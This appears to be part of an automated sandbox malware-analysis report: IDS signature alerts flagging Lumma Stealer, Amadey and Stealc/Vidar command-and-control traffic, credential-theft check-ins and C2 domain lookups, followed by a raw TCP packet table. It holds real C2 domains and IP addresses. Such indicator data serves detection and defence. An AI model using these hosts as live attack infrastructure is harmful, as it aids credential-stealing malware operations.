2024-12-13T18:54:42.038292+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50041	104.21.35.43	443	TCP
2024-12-13T18:54:42.570400+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	50042	185.215.113.43	80	TCP
2024-12-13T18:54:43.045377+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	50041	104.21.35.43	443	TCP
2024-12-13T18:54:43.045377+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	50041	104.21.35.43	443	TCP
2024-12-13T18:54:43.716512+0100	2057945	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.7	55070	1.1.1.1	53	UDP
2024-12-13T18:54:43.716512+0100	2057983	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.7	55070	1.1.1.1	53	UDP
2024-12-13T18:54:43.989776+0100	2057949	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.7	53787	1.1.1.1	53	UDP
2024-12-13T18:54:43.989776+0100	2057981	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.7	53787	1.1.1.1	53	UDP
2024-12-13T18:54:44.143214+0100	2057929	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.7	53417	1.1.1.1	53	UDP
2024-12-13T18:54:44.143214+0100	2057979	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.7	53417	1.1.1.1	53	UDP
2024-12-13T18:54:44.285132+0100	2057931	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.7	51237	1.1.1.1	53	UDP
2024-12-13T18:54:44.285132+0100	2057977	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.7	51237	1.1.1.1	53	UDP
2024-12-13T18:54:44.425114+0100	2057925	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.7	62082	1.1.1.1	53	UDP
2024-12-13T18:54:44.425114+0100	2057973	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.7	62082	1.1.1.1	53	UDP
2024-12-13T18:54:44.581773+0100	2057927	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.7	55746	1.1.1.1	53	UDP
2024-12-13T18:54:44.581773+0100	2057975	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.7	55746	1.1.1.1	53	UDP
2024-12-13T18:54:44.733957+0100	2057943	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.7	62706	1.1.1.1	53	UDP
2024-12-13T18:54:44.733957+0100	2057971	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.7	62706	1.1.1.1	53	UDP
2024-12-13T18:54:44.913358+0100	2057935	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.7	50303	1.1.1.1	53	UDP
2024-12-13T18:54:44.913358+0100	2057969	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.7	50303	1.1.1.1	53	UDP
2024-12-13T18:54:46.716100+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50046	23.55.153.106	443	TCP
2024-12-13T18:54:47.483974+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.7	50046	23.55.153.106	443	TCP
2024-12-13T18:54:49.845869+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.7	50048	TCP
2024-12-13T18:54:55.564147+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	50057	185.215.113.43	80	TCP
2024-12-13T18:54:58.135865+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50061	104.21.79.7	443	TCP
2024-12-13T18:54:59.411970+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:54:59.620659+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	50061	104.21.79.7	443	TCP
2024-12-13T18:54:59.620659+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	50061	104.21.79.7	443	TCP
2024-12-13T18:54:59.623533+0100	2057945	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.7	65511	1.1.1.1	53	UDP
2024-12-13T18:54:59.623533+0100	2057983	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.7	65511	1.1.1.1	53	UDP
2024-12-13T18:54:59.768629+0100	2057949	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.7	57063	1.1.1.1	53	UDP
2024-12-13T18:54:59.768629+0100	2057981	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.7	57063	1.1.1.1	53	UDP
2024-12-13T18:54:59.912134+0100	2057929	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.7	60755	1.1.1.1	53	UDP
2024-12-13T18:54:59.912134+0100	2057979	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.7	60755	1.1.1.1	53	UDP
2024-12-13T18:55:00.062617+0100	2057931	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.7	57433	1.1.1.1	53	UDP
2024-12-13T18:55:00.062617+0100	2057977	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.7	57433	1.1.1.1	53	UDP
2024-12-13T18:55:00.201818+0100	2057925	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.7	55846	1.1.1.1	53	UDP
2024-12-13T18:55:00.201818+0100	2057973	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.7	55846	1.1.1.1	53	UDP
2024-12-13T18:55:00.343394+0100	2057927	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.7	61261	1.1.1.1	53	UDP
2024-12-13T18:55:00.343394+0100	2057975	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.7	61261	1.1.1.1	53	UDP
2024-12-13T18:55:00.489130+0100	2057943	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.7	59311	1.1.1.1	53	UDP
2024-12-13T18:55:00.489130+0100	2057971	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.7	59311	1.1.1.1	53	UDP
2024-12-13T18:55:00.636229+0100	2057935	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.7	63849	1.1.1.1	53	UDP
2024-12-13T18:55:00.636229+0100	2057969	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.7	63849	1.1.1.1	53	UDP
2024-12-13T18:55:01.695826+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:02.667391+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50066	23.55.153.106	443	TCP
2024-12-13T18:55:03.242643+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:03.431532+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.7	50066	23.55.153.106	443	TCP
2024-12-13T18:55:04.463596+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:08.096824+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:09.710054+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	50059	185.215.113.206	80	TCP
2024-12-13T18:55:28.094309+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	50134	185.215.113.206	80	TCP
2024-12-13T18:57:35.190388+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.7	50210	89.35.131.209	80	TCP
2024-12-13T18:58:01.292419+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.7	50218	TCP
2024-12-13T18:58:02.638543+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	50222	185.215.113.43	80	TCP
2024-12-13T18:58:11.545656+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.10.31	443	192.168.2.7	50228	TCP
2024-12-13T18:58:13.854991+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.10.31	443	192.168.2.7	50230	TCP
2024-12-13T18:58:18.286943+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.7	50243	185.215.113.43	80	TCP
2024-12-13T18:59:19.534710+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.7	50405	116.203.10.31	443	TCP
2024-12-13T19:00:40.001998+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.7	50446	89.35.131.209	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 18:52:05.473788023 CET	49674	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:05.477260113 CET	49675	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:05.536382914 CET	49672	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:09.364824057 CET	49677	443	192.168.2.7	20.50.201.200
Dec 13, 2024 18:52:09.739362955 CET	49677	443	192.168.2.7	20.50.201.200
Dec 13, 2024 18:52:10.489376068 CET	49677	443	192.168.2.7	20.50.201.200
Dec 13, 2024 18:52:11.981060982 CET	49677	443	192.168.2.7	20.50.201.200
Dec 13, 2024 18:52:14.958117962 CET	49677	443	192.168.2.7	20.50.201.200
Dec 13, 2024 18:52:15.083173037 CET	49674	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:15.083405018 CET	49675	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:15.145612955 CET	49672	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:18.122603893 CET	443	49699	104.98.116.138	192.168.2.7
Dec 13, 2024 18:52:18.122730017 CET	49699	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:20.911489010 CET	49677	443	192.168.2.7	20.50.201.200
Dec 13, 2024 18:52:25.909894943 CET	49699	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:25.910195112 CET	49716	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:25.910257101 CET	443	49716	104.98.116.138	192.168.2.7
Dec 13, 2024 18:52:25.910343885 CET	49716	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:25.917263985 CET	49716	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:52:25.917278051 CET	443	49716	104.98.116.138	192.168.2.7
Dec 13, 2024 18:52:26.029720068 CET	443	49699	104.98.116.138	192.168.2.7
Dec 13, 2024 18:52:32.817549944 CET	49677	443	192.168.2.7	20.50.201.200
Dec 13, 2024 18:53:09.951730967 CET	443	49716	104.98.116.138	192.168.2.7
Dec 13, 2024 18:53:09.951848984 CET	49716	443	192.168.2.7	104.98.116.138
Dec 13, 2024 18:53:16.534609079 CET	49835	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:16.654457092 CET	80	49835	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:16.657999992 CET	49835	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:16.807684898 CET	49835	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:16.927663088 CET	80	49835	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:18.000237942 CET	80	49835	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:18.000324011 CET	49835	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:19.540194988 CET	49835	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:19.540719032 CET	49841	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:19.660475016 CET	80	49835	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:19.660514116 CET	80	49841	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:19.660551071 CET	49835	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:19.660626888 CET	49841	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:19.660798073 CET	49841	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:19.780448914 CET	80	49841	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:21.020936012 CET	80	49841	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:21.021018982 CET	49841	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:21.068830967 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:21.188680887 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:21.188796997 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:21.188949108 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:21.308710098 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516288996 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516302109 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516311884 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516362906 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516375065 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516386032 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516391039 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516392946 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.516402006 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516412973 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516424894 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.516450882 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.516474962 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.638314962 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.638382912 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.638458967 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.638458967 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.642535925 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.642724991 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.704725981 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.704756021 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.704792023 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.705084085 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.708964109 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.709029913 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.709028959 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.709115982 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.717302084 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.717643023 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.720369101 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.720460892 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.720545053 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.720737934 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.728775024 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.728858948 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.728889942 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.728965998 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.737198114 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.737282991 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.737423897 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.737423897 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.745568037 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.745661020 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.745697021 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.745768070 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.753896952 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.753966093 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.753973007 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.754142046 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.762271881 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.762351990 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.762356043 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.762408972 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.770684004 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.770719051 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.770773888 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.771189928 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.779077053 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.779222012 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.779251099 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.779277086 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.787471056 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.787568092 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.787591934 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.787650108 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.824651003 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.824806929 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.897135019 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.897150040 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.897231102 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.899045944 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.899202108 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.899234056 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.899279118 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.903381109 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.903553009 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.905031919 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.905086994 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.905107021 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.905266047 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.909750938 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.909856081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.909902096 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.909943104 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.916064978 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.916076899 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.916156054 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.916156054 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.919714928 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.919826031 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.919867039 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.920042038 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.923979998 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.924058914 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.924287081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.924401045 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.928376913 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.928569078 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.928575993 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.928625107 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.932761908 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.932828903 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.932918072 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.933027983 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.937221050 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.937288046 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.937385082 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.937450886 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.941574097 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.941653013 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.941843987 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.941962004 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.946005106 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.946017981 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.946177959 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.946177959 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.949148893 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.949259996 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.949342966 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.949394941 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.953588009 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.953646898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.953737974 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.953737974 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.961230993 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.961244106 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.961293936 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.961328983 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.962955952 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.963040113 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.963110924 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.963246107 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.966505051 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.966604948 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.966665983 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.966768026 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.970357895 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.970372915 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.970451117 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.970451117 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.974263906 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.974329948 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.974337101 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.974484921 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.977646112 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.977657080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:22.977718115 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:22.977718115 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.016999006 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.017091036 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.017112970 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.017214060 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.017214060 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.018856049 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.018944025 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.018971920 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.019061089 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.022531986 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.022648096 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.022892952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.022892952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.026145935 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.026252985 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.088752031 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.088828087 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.088913918 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.089068890 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.090235949 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.090306044 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.090724945 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.090837955 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.090847969 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.091002941 CET	49847	80	192.168.2.7	45.11.183.55
